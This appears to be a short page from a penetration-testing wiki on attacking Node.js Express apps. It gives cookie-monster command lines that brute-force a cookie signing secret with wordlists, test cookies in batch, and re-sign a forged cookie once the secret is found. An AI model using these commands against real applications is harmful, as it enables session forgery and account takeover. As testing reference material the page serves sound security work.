hacktricks/network-services-pentesting/pentesting-web/nodejs-express.md
Carlos Polop da6aaca1c2 a
2024-02-08 22:36:15 +01:00

860 B

NodeJS Express

The tool https://github.com/DigitalInterruption/cookie-monster is a utility for automating the testing and re-signing of Express.js cookie secrets.

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -n session

Custom wordlist

cookie-monster -c eyJmb28iOiJiYXIifQ== -s LVMVxSNPdU_G8S3mkjlShUD78s4 -w custom.lst

Test multiple cookies using batch mode

cookie-monster -b -f cookies.json

Test multiple cookies using batch mode with a custom wordlist

cookie-monster -b -f cookies.json -w custom.lst

iI you know the secret you can sign a the cookie.

cookie-monster -e -f new_cookie.json -k secret